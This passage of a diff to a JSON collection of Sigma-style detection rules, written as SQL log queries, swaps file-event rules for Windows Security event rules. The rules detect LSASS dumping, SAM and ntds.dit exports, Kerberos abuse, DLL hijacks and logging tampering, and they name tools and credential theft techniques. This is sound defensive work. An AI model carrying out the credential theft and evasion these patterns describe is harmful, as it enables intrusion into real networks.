'%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": "win_security_alert_active_directory_user_control.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "status": "test", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ "attack.credential_access", - "attack.t1003" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "HieuTT35, Nasreddine Bencherchali", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", - "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "status": "experimental", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.t1187" ], "falsepositives": [ - "Files that accidentally contain these strings" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "Runas command-line tool using /netonly parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_overpass_the_hash.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "status": "test", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Faulty legacy applications" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "status": "test", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1003.006" ], "falsepositives": [ - "Rare cases of administrative activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_sam_dump.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", - "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "title": "HybridConnectionManager Service Installation", + "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE 